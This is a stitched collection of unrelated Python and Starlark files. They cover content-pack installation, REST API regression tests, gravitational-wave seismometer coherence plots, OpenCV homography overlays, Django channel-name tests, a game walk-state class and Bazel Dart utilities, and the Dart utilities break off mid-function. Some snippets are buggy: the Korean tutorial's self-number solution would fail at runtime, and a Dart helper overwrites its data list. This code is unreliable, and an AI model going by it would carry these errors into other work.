thread_index (int): the thread index.
lock (Lock): A lock object.
"""
pack_data = []
if pack_id not in packs_to_install:
pack_display_name = get_pack_display_name(pack_id)
if pack_display_name:
pack_data = search_pack(client, prints_manager, pack_display_name, thread_index, lock)
if pack_data:
dependencies = get_pack_dependencies(client, prints_manager, pack_data, thread_index, lock)
current_packs_to_install = [pack_data]
current_packs_to_install.extend(dependencies)
lock.acquire()
for pack in current_packs_to_install:
if pack['id'] not in packs_to_install:
packs_to_install.append(pack['id'])
installation_request_body.append(pack)
lock.release()
def add_pack_to_installation_request(pack_id, installation_request_body):
metadata_path = os.path.join(PACKS_FULL_PATH, pack_id, PACK_METADATA_FILE)
with open(metadata_path, 'r') as json_file:
pack_metadata = json.load(json_file)
version = pack_metadata.get('currentVersion')
installation_request_body.append({
'id': pack_id,
'version': version
})
def install_all_content_packs(client, host, prints_manager, thread_index=0):
all_packs = []
for pack_id in os.listdir(PACKS_FULL_PATH):
if pack_id not in IGNORED_FILES and pack_id != 'Silverfort': # todo: remove silverfort when fixed
add_pack_to_installation_request(pack_id, all_packs)
install_packs(client, host, prints_manager, thread_index, all_packs)
def upload_zipped_packs(client, host, prints_manager, thread_index, pack_path):
""" Install packs from zip file.
Args:
client (demisto_client): The configured client to use.
host (str): The server URL.
prints_manager (ParallelPrintsManager): Print manager object.
thread_index (int): the index (for prints_manager).
pack_path (str): path to pack zip.
"""
header_params = {
'Content-Type': 'multipart/form-data'
}
file_path = os.path.abspath(pack_path)
files = {'file': file_path}
message = 'Making "POST" request to server {} - to install all packs from file {}'.format(host, pack_path)
prints_manager.add_print_job(message, print_color, thread_index, LOG_COLORS.GREEN)
prints_manager.execute_thread_prints(thread_index)
# make the pack installation request
try:
response_data, status_code, _ = client.api_client.call_api(resource_path='/contentpacks/installed/upload',
method='POST',
header_params=header_params, files=files)
if 200 <= status_code < 300:
message = 'All packs from {} were successfully installed!\n'.format(pack_path)
prints_manager.add_print_job(message, print_color, thread_index, LOG_COLORS.GREEN)
prints_manager.execute_thread_prints(thread_index)
else:
result_object = ast.literal_eval(response_data)
message = result_object.get('message', '')
err_msg = 'Failed to install packs - with status code {}\n{}\n'.format(status_code, message)
raise Exception(err_msg)
except Exception as e:
err_msg = 'The request to install packs has failed. Reason:\n{}\n'.format(str(e))
raise Exception(err_msg)
def search_and_install_packs_and_their_dependencies(pack_ids, client, prints_manager, thread_index=0):
""" Searches for the packs from the specified list, searches their dependencies, and then installs them.
Args:
pack_ids (list): A list of the pack ids to search and install.
client (demisto_client): The client to connect to.
prints_manager (ParallelPrintsManager): A prints manager object.
thread_index (int): the thread index.
Returns (list, bool):
A list of the installed packs' ids, or an empty list if is_nightly == True.
A flag that indicates if the operation succeeded or not.
"""
host = client.api_client.configuration.host
msg = 'Starting to search and install packs in server: {}\n'.format(host)
prints_manager.add_print_job(msg, print_color, thread_index, LOG_COLORS.GREEN)
prints_manager.execute_thread_prints(thread_index)
packs_to_install = [] # we save all the packs we want to install, to avoid duplications
installation_request_body = [] # the packs to install, in the request format
threads_list = []
lock = Lock()
for pack_id in pack_ids:
thread = Thread(target=search_pack_and_its_dependencies,
kwargs={'client': client,
'prints_manager': prints_manager,
'pack_id': pack_id,
'packs_to_install': packs_to_install,
'installation_request_body': installation_request_body,
'thread_index': thread_index,
'lock': lock})
threads_list.append(thread)
run_threads_list(threads_list)
install_packs(client, host, prints_manager, thread_index, installation_request_body)
return packs_to_install, SUCCESS_FLAG
|
import json
import requests
def test_files_get_all(regtest, db, url, file):
r = requests.get(url + '/files')
f = r.json()
f['data']['files'][0]['timestamp'] = None
regtest.write(str(json.dumps(f, sort_keys=True)))
def test_files_get_filter(regtest, db, url, file):
r = requests.get(url + '/files?filter[name]=' + file['name'])
f = r.json()
f['data']['files'][0]['timestamp'] = None
regtest.write(str(json.dumps(f, sort_keys=True)))
def test_files_get_filter_1(regtest, db, url):
r = requests.get(url + '/files?filter[name]=abcd')
regtest.write(r.text)
def test_file_hex_get_missing(regtest, db, url):
r = requests.get(url + '/file/abcd/hex')
regtest.write(r.text)
def test_file_hex_get(regtest, db, url, file):
r = requests.get(url + '/file/' + file['sha256_digest'] + '/hex')
regtest.write(r.text)
def test_file_get_missing(regtest, db, url):
r = requests.get(url + '/file')
regtest.write(r.text)
def test_file_get_missing_1(regtest, db, url):
r = requests.get(url + '/file/abcd')
regtest.write(r.text)
def test_file_get(regtest, db, url, file):
r = requests.get(url + '/file/' + file['sha256_digest'])
f = r.json()
f['data']['file']['timestamp'] = None
regtest.write(str(json.dumps(f, sort_keys=True)))
def test_file_patch_missing(regtest, db, url):
r = requests.patch(url + '/file/abcd')
regtest.write(r.text)
def test_file_patch_missing_1(regtest, db, url, file):
r = requests.patch(url + '/file/' + file['sha256_digest'])
regtest.write(r.text)
def test_file_patch(regtest, db, url, file):
data = '{"description": "abcd"}'
r = requests.patch(url + '/file/' + file['sha256_digest'], data=data)
f = r.json()
f['data']['file']['timestamp'] = None
regtest.write(str(json.dumps(f, sort_keys=True)))
def test_file_put_missing(regtest, db, url):
r = requests.put(url + '/file/abcd')
regtest.write(r.text)
def test_file_put_missing_1(regtest, db, url, file):
r = requests.put(url + '/file/' + file['sha256_digest'])
regtest.write(r.text)
def test_file_put(regtest, db, url, file):
data = '{"name": "abcd"}'
r = requests.put(url + '/file/' + file['sha256_digest'], data=data)
f = r.json()
f['data']['file']['timestamp'] = None
regtest.write(str(json.dumps(f, sort_keys=True)))
def test_file_delete_missing(regtest, db, url):
r = requests.delete(url + '/file/abcd')
regtest.write(r.text)
def test_file_delete(regtest, db, url, file):
r = requests.delete(url + '/file/' + file['sha256_digest'])
regtest.write(str(r.text))
regtest.write(str(r.status_code))
|
import numpy as np
import matplotlib.pyplot as plt
from gwpy.timeseries import TimeSeriesDict
from gwpy.time import tconvert
import re
import warnings
warnings.filterwarnings('ignore')
#start = tconvert('Jul 20 2019 19:00:00 JST')
end = tconvert('Jul 20 2019 21:25:00 JST')
start = end - 2**11
channels = ['K1:PEM-SEIS_EXV_GND_X_OUT_DQ',
'K1:PEM-SEIS_IXV_GND_X_OUT_DQ',
'K1:GIF-X_STRAIN_IN1_DQ',
'K1:ALS-X_PDH_SLOW_DAQ_OUT_DQ'
]
data = TimeSeriesDict.fetch(channels,start,end,host='10.68.10.122',port=8088,
verbose=True,pad=0.0)
exv_x = data.values()[0]
ixv_x = data.values()[1]
gif = data.values()[2]*((532e-9/2)/(2.0*np.pi))/1500*3000.0*1e6 # um
pdh = data.values()[3]
gif = gif.resample(512)
pdh = pdh.resample(512)
# Timeseries
plot = pdh.plot(label=pdh.name.replace('_',' '),ylabel='Count?')
ax = plot.gca()
ax.legend()
plot.savefig('huge.png')
plot.close
# differential motion of the seismometers
diff = exv_x - ixv_x
comm = exv_x + ixv_x
# coherence
csd_gif_diff = gif.csd(diff, fftlength=2**6, overlap=2**5) # 2**7 = 128
csd_pdh_gif = pdh.csd(gif, fftlength=2**6, overlap=2**5) # 2**7 = 128
csd_pdh_diff = pdh.csd(diff, fftlength=2**6, overlap=2**5) # 2**7 = 128
csd_pdh_comm = pdh.csd(comm, fftlength=2**6, overlap=2**5) # 2**7 = 128
gif = gif.asd(fftlength=2**6, overlap=2**5)
diff = diff.asd(fftlength=2**6, overlap=2**5)
comm = comm.asd(fftlength=2**6, overlap=2**5)
pdh = pdh.asd(fftlength=2**6, overlap=2**5)
coh_gif_diff = csd_gif_diff/gif/(diff*1j)
coh_pdh_gif = csd_pdh_gif/pdh/gif
coh_pdh_diff = csd_pdh_diff/pdh/(diff*1j)
coh_pdh_comm = csd_pdh_comm/pdh/(comm*1j)
comm = comm/(2.0*np.pi*comm.frequencies.value)
diff = diff/(2.0*np.pi*diff.frequencies.value)
# plot Coherence
fig, (ax0,ax1,ax2) = plt.subplots(3,1,figsize=(10,10))
ax0.loglog(gif,label='GIF',color='k')
ax0.loglog(pdh,label='PDH (um?)',color='b',linestyle='-')
ax0.loglog(diff,label='Seis Diff',color='r',linestyle='-')
ax0.loglog(comm,label='Seis Comm',color='r',linestyle='--')
ax0.legend(fontsize=15,loc='upper right')
ax0.set_ylabel('Diplacement [um/rtHz]')
ax0.set_ylim(1e-3,1e1)
ax0.set_xlim(3e-2, 10)
ax1.semilogx(coh_gif_diff.abs()**2,label='GIF vs Seis Diff',color='g',linestyle='-')
ax1.semilogx(coh_pdh_gif.abs()**2,label='PDH vs GIF',color='k',linestyle='-')
ax1.semilogx(coh_pdh_diff.abs()**2,label='PDH vs Diffs',color='b',linestyle='-')
ax1.semilogx(coh_pdh_comm.abs()**2,label='PDH vs Comms',color='b',linestyle='--')
ax1.set_xlabel('Frequency [Hz]')
ax1.set_ylabel('Magnitude-Squared \n Coherence')
ax1.set_ylim(0, 1)
ax1.set_xlim(3e-2, 10)
ax1.legend(fontsize=15,loc='upper right')
ax2.semilogx(coh_gif_diff.angle().rad2deg(),label='GIF vs Seis Diff',color='g',linestyle='-')
ax2.semilogx(coh_pdh_gif.angle().rad2deg(),label='PDH vs GIF',color='k',linestyle='-')
ax2.semilogx(coh_pdh_diff.angle().rad2deg(),label='PDH vs Diffs',color='b',linestyle='-')
ax2.semilogx(coh_pdh_comm.angle().rad2deg(),label='PDH vs Comms',color='b',linestyle='--')
ax2.set_ylim(-180, 180)
ax2.set_yticks(range(-180, 181, 90))
ax2.set_xlim(3e-2, 10)
ax2.legend(fontsize=15,loc='upper right')
ax2.set_ylabel('Phase [Deg.]')
plt.savefig('hoge.png')
plt.close()
|
# Copyright 2021 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
General constants.
"""
# isort: STDLIB
from enum import IntEnum
class PoolMaintenanceErrorCode(IntEnum):
"""
Maintenance error codes for the pool.
"""
NO_IPC_REQUESTS = 1
NO_POOL_CHANGES = 2
READ_ONLY = 3
def __str__(self):
return "EM%s" % str(self.value).zfill(3)
@staticmethod
def from_str(code_str):
"""
Discover the code, if any, from the code string.
:returns: the code if it finds a match, otherwise None
:rtype: PoolMaintenanceErrorCode or NoneType
"""
for code in PoolMaintenanceErrorCode:
if code_str == str(code):
return code
return None
def explain(self):
"""
Return an explanation of the error return code.
"""
if self is PoolMaintenanceErrorCode.NO_IPC_REQUESTS:
return (
"The pool will return an error on any IPC request that could "
"cause a change in the pool state, for example, a request to "
"rename a filesystem. It will still be able to respond to "
"purely informational requests."
)
if self is PoolMaintenanceErrorCode.NO_POOL_CHANGES:
return (
"The pool is unable to manage itself by reacting to events, "
"such as devicemapper events, that might require it to take "
"any maintenance operations."
)
if self is PoolMaintenanceErrorCode.READ_ONLY: # pragma: no cover
return "The pool is in read-only mode."
assert False, "impossible error code reached" # pragma: no cover
|
import unittest
class FileUtilsTestCase(unittest.TestCase):
def test1(self):
print("test1")
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
|
#빅데이터 분석, 딥러닝, 머신 러닝
import random
#seed : 주어진 숫자를 바탕으로 난수 생성(발생한 난수는 바뀌지 않는다.)
random.seed(999)
#난수 발생 5를 지정하였기에 0~4까지 난수발생
a=[random.randrange(100) for _ in range(10)]
print(a)
#데이터 -> 훈련데이터(주어진 데이터의 70% 정도)/테스트데이터(30%) -> 모델 -> 테스트데이터입력 -> 모델평가 -> 평가 결과에 따른 feedback
#알고리즘을 바꿔 모델을 바꿨을 때 학습 및 테스트 데이터가 바뀌면 비교할 수 없으므로 같은 데이터를 바뀌지 않아야 한다.
#데이터는 랜덤하게 훈련데이터와 테스트 데이터를 나누기 때문에 나오는 랜덤으로 나오는 숫자가 항상 같기 위해 seed를 이용한다.
print([i for i in range(10)]) #9까지숫자 리스트로 출력
print([i for i in a]) #random a가 리스트로 출력
#a=[86, 10, 72, 73, 68, 62, 61, 16, 82, 40]
print([i for i in a if i % 2]) #i % 2이 if를 만나서 거짓이 됨
print([i for i in a if i % 2][::-1]) # 출력을 역순으로
print([i for i in a [::-1] if i % 2]) # a를 불러올 때 역순으로
print([i for i in reversed(a) if i % 2])
a1=[random.randrange(100) for _ in range(10)]
a2=[random.randrange(100) for _ in range(10)]
a3=[random.randrange(100) for _ in range(10)]
b=[a1,a2,a3]
print(b)
print(sum([1,3,5]))
print([sum(i) for i in b])
print(sum([sum(i) for i in b]))
print([0 for i in b for j in i]) #차원 감소: 차원에서 data를 빼내서 1차원의 리스트화
#차원 축소(PCA) : 차원의 축소를 위해서 data의 가공이 들어가기 때문에 data가 변한다.
print([i for i in b])
print([j for i in b for j in i if j % 2])
print([[j for j in i] for i in b])
print([[j for j in i if j % 2] for i in b]) #for 중첩구문일때 마지막 for의 오른쪽에서 행과 열을 판단
print("="*50)
print(b)
print([i for i in b[::-1]]) #행바꿈
print([[j for j in i[::-1]] for i in b[::-1]]) #행과 열을 모두 바꿈
print(2**1000)
print(str(2**1000))
print(len(str(2**1000)))
#2**1000에 들어가는 숫자들의 합을 구하시오.
d=0
a= str(2**1000)
b=[i for i in a]
print(b)
print(len(b))
for i in b:
d+=int(i)
print(d)
print(sum([int(i) for i in str(2**1000)]))
s='707'
print(s.count('7')) #s에 7이 2개 있다는 의미
#1~100000 사이에 있는 7의 갯수를 세어보세요.
a=[str(i) for i in range(1,100001)]
print("_".join(a).count('7'))
#maria={'kor:94,'eng':91,'math':89,'sci':83}
#maria 딕셔너리에 저장된 점수의 평균을 출력하세요
import numpy as np
maria={'kor':94,'eng':91,'math':89,'sci':83}
a=np.mean([j for j in maria.values()])
print(a)
#어떤 자연수 n이 있을 때, d(n) 을 n의 각 자릿수 숫자들과 n자신을 더한 숫자라고 정의하자.
#예를들어 d(91) = 9 + 1 +91 = 101
#이 때, n을 d(n)의 제니레이터라고 한다. 91은 101의 제네레이터이다.
#어떤 숫자들은 하나 이상의 제네레이터를 가지고 있는데, 101의 제네레이터는 91뿐 아니라 100도 있다.
#그런데 반대로, 제네레이터가 없는 숫자들도 있으며, 이런 숫자를 셀프 넘버(self-number)라 한다.
#예를 들어 1,3,5,7,9,20,31은 셀프 넘버들이다.
#1이상이고 5000보다 작은 모든 셀프 넘버들의 합을 구하여라.
n=[[i for i in str(b)] for b in range(1,5000)]
for b in range(1,5000):
n[b-1].append(str(b))
m=list(map(int,i) for i in n)
print(sum(set(range(1,5000)-set(m.sum(axis=1)))))
#print(m.sum(axis=0))
print(n)
# i=567
# for t in str(i):
# print(int(t)+1)
#
# set(range(1,5))-set(range(1,3)) #{1,2,3,4}-{1,2}={3.4}
|
import cv2 as cv
import numpy as np
import os
import sys
os.chdir(sys.path[0])
coeff = 2
target = cv.imread('resources/angel.jpg')
tgt_shape = np.flip(np.shape(target)[0:2])
target = cv.resize(target, (int(tgt_shape[0]/coeff), int(tgt_shape[1]/coeff)))
replacement = cv.imread('resources/book_template.jpg')
replacement = cv.resize(replacement, (int(tgt_shape[0]/coeff), int(tgt_shape[1]/coeff)))
video = cv.VideoCapture('resources/angel.mp4')
orb = cv.ORB_create()
bf = cv.BFMatcher.create(normType=cv.NORM_HAMMING, crossCheck=True)
tgt_pts, tgt_desc = orb.detectAndCompute(target, None)
match_out = cv.VideoWriter(f'results/2-matches.avi', cv.VideoWriter_fourcc('M', 'J', 'P', 'G'), 30, (1963, 826))
add_out = cv.VideoWriter(f'results/2-superimposed.avi', cv.VideoWriter_fourcc('M', 'J', 'P', 'G'), 30, (960, 540))
def readFrame():
ret, frame = video.read()
if ret == True:
shape = np.flip(np.shape(frame)[0:2])
frame = cv.resize(frame, (int(shape[0]/coeff), int(shape[1]/coeff)))
return ret, frame
while True:
k = cv.waitKey(1) & 0xff
if k == 27:
break
ret, frame = readFrame()
if ret is not True:
break
else:
vid_pts, vid_desc = orb.detectAndCompute(frame, None)
matches = bf.match(tgt_desc, vid_desc)
matches = sorted(matches, key=lambda x:x.distance)
pt0 = []
pt1 = []
for i in range(15):
pt0.append(tgt_pts[matches[i].queryIdx].pt)
pt1.append(vid_pts[matches[i].trainIdx].pt)
pt0 = np.asarray(pt0).reshape(-1, 1, 2)
pt1 = np.asarray(pt1).reshape(-1, 1, 2)
h, status = cv.findHomography(pt0, pt1)
warp_out = cv.warpPerspective(replacement, h, (replacement.shape[1], replacement.shape[0]))
warp_crop = warp_out[:frame.shape[0], :frame.shape[1]]
warp_mask = cv.cvtColor(cv.threshold(cv.cvtColor(warp_crop, cv.COLOR_BGR2GRAY), 1, 255, cv.THRESH_BINARY_INV)[1], cv.COLOR_GRAY2BGR)
match_frame = cv.drawMatches(target, tgt_pts, frame, vid_pts, matches[:20], None, flags=2)
add_frame = frame & warp_mask
add_frame = add_frame | warp_crop
cv.imshow('match frame', match_frame)
cv.imshow('add frame', add_frame)
match_out.write(match_frame)
add_out.write(add_frame)
match_out.release()
add_out.release()
cv.destroyAllWindows()
exit()
|
from django.urls import reverse
from .base import AuthenticatedAPITestCase
from ..models import OffTopicChannelName
class UnauthenticatedTests(AuthenticatedAPITestCase):
def setUp(self):
super().setUp()
self.client.force_authenticate(user=None)
def test_cannot_read_off_topic_channel_name_list(self):
"""Return a 401 response when not authenticated."""
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.get(url)
self.assertEqual(response.status_code, 401)
def test_cannot_read_off_topic_channel_name_list_with_random_item_param(self):
"""Return a 401 response when `random_items` provided and not authenticated."""
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.get(f'{url}?random_items=no')
self.assertEqual(response.status_code, 401)
class EmptyDatabaseTests(AuthenticatedAPITestCase):
def test_returns_empty_object(self):
"""Return empty list when no names in database."""
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json(), [])
def test_returns_empty_list_with_get_all_param(self):
"""Return empty list when no names and `random_items` param provided."""
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.get(f'{url}?random_items=5')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json(), [])
def test_returns_400_for_bad_random_items_param(self):
"""Return error message when passing not integer as `random_items`."""
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.get(f'{url}?random_items=totally-a-valid-integer')
self.assertEqual(response.status_code, 400)
self.assertEqual(response.json(), {
'random_items': ["Must be a valid integer."]
})
def test_returns_400_for_negative_random_items_param(self):
"""Return error message when passing negative int as `random_items`."""
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.get(f'{url}?random_items=-5')
self.assertEqual(response.status_code, 400)
self.assertEqual(response.json(), {
'random_items': ["Must be a positive integer."]
})
class ListTests(AuthenticatedAPITestCase):
@classmethod
def setUpTestData(cls):
cls.test_name = OffTopicChannelName.objects.create(name='lemons-lemonade-stand', used=False)
cls.test_name_2 = OffTopicChannelName.objects.create(name='bbq-with-bisk', used=True)
def test_returns_name_in_list(self):
"""Return all off-topic channel names."""
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.json(),
[
self.test_name.name,
self.test_name_2.name
]
)
def test_returns_single_item_with_random_items_param_set_to_1(self):
"""Return not-used name instead used."""
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.get(f'{url}?random_items=1')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.json()), 1)
self.assertEqual(response.json(), [self.test_name.name])
def test_running_out_of_names_with_random_parameter(self):
"""Reset names `used` parameter to `False` when running out of names."""
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.get(f'{url}?random_items=2')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json(), [self.test_name.name, self.test_name_2.name])
class CreationTests(AuthenticatedAPITestCase):
def setUp(self):
super().setUp()
url = reverse('api:bot:offtopicchannelname-list')
self.name = "abcdefghijklmnopqrstuvwxyz-0123456789"
response = self.client.post(f'{url}?name={self.name}')
self.assertEqual(response.status_code, 201)
def test_returns_201_for_unicode_chars(self):
"""Accept all valid characters."""
url = reverse('api:bot:offtopicchannelname-list')
names = (
'𝖠𝖡𝖢𝖣𝖤𝖥𝖦𝖧𝖨𝖩𝖪𝖫𝖬𝖭𝖮𝖯𝖰𝖱𝖲𝖳𝖴𝖵𝖶𝖷𝖸𝖹',
'ǃ?’',
)
for name in names:
response = self.client.post(f'{url}?name={name}')
self.assertEqual(response.status_code, 201)
def test_returns_400_for_missing_name_param(self):
"""Return error message when name not provided."""
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.post(url)
self.assertEqual(response.status_code, 400)
self.assertEqual(response.json(), {
'name': ["This query parameter is required."]
})
def test_returns_400_for_bad_name_param(self):
"""Return error message when invalid characters provided."""
url = reverse('api:bot:offtopicchannelname-list')
invalid_names = (
'space between words',
'ABCDEFGHIJKLMNOPQRSTUVWXYZ',
'!?\'@#$%^&*()',
)
for name in invalid_names:
response = self.client.post(f'{url}?name={name}')
self.assertEqual(response.status_code, 400)
self.assertEqual(response.json(), {
'name': ["Enter a valid value."]
})
class DeletionTests(AuthenticatedAPITestCase):
@classmethod
def setUpTestData(cls):
cls.test_name = OffTopicChannelName.objects.create(name='lemons-lemonade-stand')
cls.test_name_2 = OffTopicChannelName.objects.create(name='bbq-with-bisk')
def test_deleting_unknown_name_returns_404(self):
"""Return 404 response when trying to delete unknown name."""
url = reverse('api:bot:offtopicchannelname-detail', args=('unknown-name',))
response = self.client.delete(url)
self.assertEqual(response.status_code, 404)
def test_deleting_known_name_returns_204(self):
"""Return 204 response when deleting was successful."""
url = reverse('api:bot:offtopicchannelname-detail', args=(self.test_name.name,))
response = self.client.delete(url)
self.assertEqual(response.status_code, 204)
def test_name_gets_deleted(self):
"""Name gets actually deleted."""
url = reverse('api:bot:offtopicchannelname-detail', args=(self.test_name_2.name,))
response = self.client.delete(url)
self.assertEqual(response.status_code, 204)
url = reverse('api:bot:offtopicchannelname-list')
response = self.client.get(url)
self.assertNotIn(self.test_name_2.name, response.json())
|
from pandac.PandaModules import *
from direct.task.Task import Task
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import StateData
from direct.fsm import ClassicFSM, State
from direct.fsm import State
class Walk(StateData.StateData):
notify = DirectNotifyGlobal.directNotify.newCategory('Walk')
def __init__(self, doneEvent):
StateData.StateData.__init__(self, doneEvent)
self.fsm = ClassicFSM.ClassicFSM('Walk', [State.State('off', self.enterOff, self.exitOff, ['walking', 'swimming', 'slowWalking']),
State.State('walking', self.enterWalking, self.exitWalking, ['swimming', 'slowWalking']),
State.State('swimming', self.enterSwimming, self.exitSwimming, ['walking', 'slowWalking']),
State.State('slowWalking', self.enterSlowWalking, self.exitSlowWalking, ['walking', 'swimming'])], 'off', 'off')
self.fsm.enterInitialState()
self.IsSwimSoundAudible = 0
self.swimSoundPlaying = 0
def load(self):
pass
def unload(self):
del self.fsm
def enter(self, slowWalk = 0):
base.localAvatar.startPosHprBroadcast()
base.localAvatar.startBlink()
base.localAvatar.attachCamera()
shouldPush = 1
if len(base.localAvatar.cameraPositions) > 0:
shouldPush = not base.localAvatar.cameraPositions[base.localAvatar.cameraIndex][4]
base.localAvatar.startUpdateSmartCamera(shouldPush)
base.localAvatar.showName()
base.localAvatar.collisionsOn()
base.localAvatar.startGlitchKiller()
base.localAvatar.enableAvatarControls()
def exit(self):
self.fsm.request('off')
self.ignore(base.JUMP)
base.localAvatar.disableAvatarControls()
base.localAvatar.stopUpdateSmartCamera()
base.localAvatar.stopPosHprBroadcast()
base.localAvatar.stopBlink()
base.localAvatar.detachCamera()
base.localAvatar.stopGlitchKiller()
base.localAvatar.collisionsOff()
base.localAvatar.controlManager.placeOnFloor()
def enterOff(self):
pass
def exitOff(self):
pass
def enterWalking(self):
if base.localAvatar.hp > 0:
base.localAvatar.startTrackAnimToSpeed()
base.localAvatar.setWalkSpeedNormal()
base.localAvatar.applyBuffs()
else:
self.fsm.request('slowWalking')
def exitWalking(self):
base.localAvatar.stopTrackAnimToSpeed()
def setSwimSoundAudible(self, IsSwimSoundAudible):
self.IsSwimSoundAudible = IsSwimSoundAudible
if IsSwimSoundAudible == 0 and self.swimSoundPlaying:
self.swimSound.stop()
self.swimSoundPlaying = 0
def enterSwimming(self, swimSound):
base.localAvatar.setWalkSpeedNormal()
base.localAvatar.applyBuffs()
self.swimSound = swimSound
self.swimSoundPlaying = 0
base.localAvatar.b_setAnimState('swim', base.localAvatar.animMultiplier)
base.localAvatar.startSleepSwimTest()
taskMgr.add(self.__swim, 'localToonSwimming')
def exitSwimming(self):
taskMgr.remove('localToonSwimming')
self.swimSound.stop()
del self.swimSound
self.swimSoundPlaying = 0
base.localAvatar.stopSleepSwimTest()
def __swim(self, task):
speed = base.mouseInterfaceNode.getSpeed()
if speed == 0 and self.swimSoundPlaying:
self.swimSoundPlaying = 0
self.swimSound.stop()
elif speed > 0 and self.swimSoundPlaying == 0 and self.IsSwimSoundAudible:
self.swimSoundPlaying = 1
base.playSfx(self.swimSound, looping=1)
return Task.cont
def enterSlowWalking(self):
self.accept(base.localAvatar.uniqueName('positiveHP'), self.__handlePositiveHP)
base.localAvatar.startTrackAnimToSpeed()
base.localAvatar.setWalkSpeedSlow()
def __handlePositiveHP(self):
self.fsm.request('walking')
def exitSlowWalking(self):
base.localAvatar.stopTrackAnimToSpeed()
self.ignore(base.localAvatar.uniqueName('positiveHP'))
|
# Copyright 2016 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Internal implemenation utility functions for Dart rules.
WARNING: NOT A PUBLIC API.
This code is public only by virtue of the fact that Bazel does not yet support
a mechanism for enforcing limitied visibility of Skylark rules. This code makes
no gurantees of API stability and is intended solely for use by the Dart rules.
"""
_third_party_prefix = "third_party/dart/"
def assert_third_party_licenses(ctx):
"""Asserts license attr on non-testonly third-party packages."""
if (not ctx.attr.testonly
and not ctx.attr.license_files
and ctx.label.package.startswith(_third_party_prefix)):
fail("%s lacks license_files attribute, " % ctx.label +
"required for all non-testonly third-party Dart library rules")
def collect_files(dart_ctx):
srcs = dart_ctx.srcs
data = dart_ctx.data
for d in dart_ctx.transitive_deps.values():
srcs = srcs + d.dart.srcs
data = srcs + d.dart.data
return (srcs, data)
def _collect_transitive_deps(deps):
"""Collects transitive closure of deps.
Args:
deps: input deps Target collection. All targets must have a 'dart' provider.
Returns:
Transitive closure of deps.
"""
transitive_deps = {}
for dep in deps:
transitive_deps.update(dep.dart.transitive_deps)
transitive_deps["%s" % dep.dart.label] = dep
return transitive_deps
def _label_to_dart_package_name(label):
"""Returns the Dart package name for the specified label.
Packages under //third_party/dart resolve to their external Pub package names.
All other packages resolve to a unique identifier based on their repo path.
Examples:
//foo/bar/baz: foo.bar.baz
//third_party/dart/args: args
//third_party/guice: third_party.guice
Restrictions:
Since packages outside of //third_party/dart are identified by their path
components joined by periods, it is an error for the label package to
contain periods.
Args:
label: the label whose package name is to be returned.
Returns:
The Dart package name associated with the label.
"""
package_name = label.package
if label.package.startswith(_third_party_prefix):
third_party_path = label.package[len(_third_party_prefix):]
if "/" not in third_party_path:
package_name = third_party_path
if "." in package_name:
fail("Dart package paths may not contain '.': " + label.package)
return package_name.replace("/", ".")
def _new_dart_context(label,
package,
lib_root,
srcs=None,
data=None,
deps=None,
transitive_deps=None):
return struct(
label=label,
package=package,
lib_root=lib_root,
srcs=srcs or [],
data=data or [],
deps=deps or [],
transitive_deps=dict(transitive_deps or {}),
)
def make_dart_context(label,
package=None,
lib_root=None,
srcs=None,
data=None,
deps=None):
if not package:
package = _label_to_dart_package_name(label)
if not lib_root:
lib_root = "%s/lib/" % label.package
srcs = srcs or []
data = data or []
deps = deps or []
transitive_deps = _collect_transitive_deps(deps)
return struct(
label=label,
package=package,
lib_root=lib_root,
srcs=srcs,
data=data,
deps=deps,
transitive_deps=transitive_deps,
)
def _merge_dart_context(dart_ctx1, dart_ctx2):
"""Merges two dart contexts whose package and lib_root must be identical."""
if dart_ctx1.package != dart_ctx2.package:
fail("Incompatible packages: %s and %s" % (dart_ctx1.package,
dart_ctx2.package))
if dart_ctx1.lib_root != dart_ctx2.lib_root:
fail("Incompatible lib_roots for package %s:\n" % dart_ctx1.package +
" %s declares: %s\n" % (dart_ctx1.label, dart_ctx1.lib_root) +
" %s declares: %s\n" % (dart_ctx2.label, dart_ctx2.lib_root) +
"Targets in the same package must declare the same lib_root")
transitive_deps = dart_ctx1.transitive_deps
transitive_deps.update(dart_ctx1.transitive_deps)
return _new_dart_context(
label=dart_ctx1.label,
package=dart_ctx1.package,
lib_root=dart_ctx1.lib_root,
srcs=dart_ctx1.srcs + dart_ctx2.srcs,
data=dart_ctx1.data + dart_ctx2.data,
deps=dart_ctx1.deps + dart_ctx2.deps,
transitive_deps=transitive_deps,
)
def _collect_dart_context(dart_ctx, transitive=True, include_self=True):
"""Collects and returns dart contexts."""
# Collect direct or transitive deps.
dart_ctxs = [dart_ctx]
if transitive:
dart_ctxs += [d.dart for d in dart_ctx.transitive_deps.values()]
else:
dart_ctxs += [d.dart for d in dart_ctx.deps]
# Optionally, exclude all self-packages.
if not include_self:
dart_ctxs = [c for c in dart_ctxs if c.package != dart_ctx.package]
# Merge Dart context by package.
ctx_map = {}
for dc in dart_ctxs:
if dc.package in ctx_map:
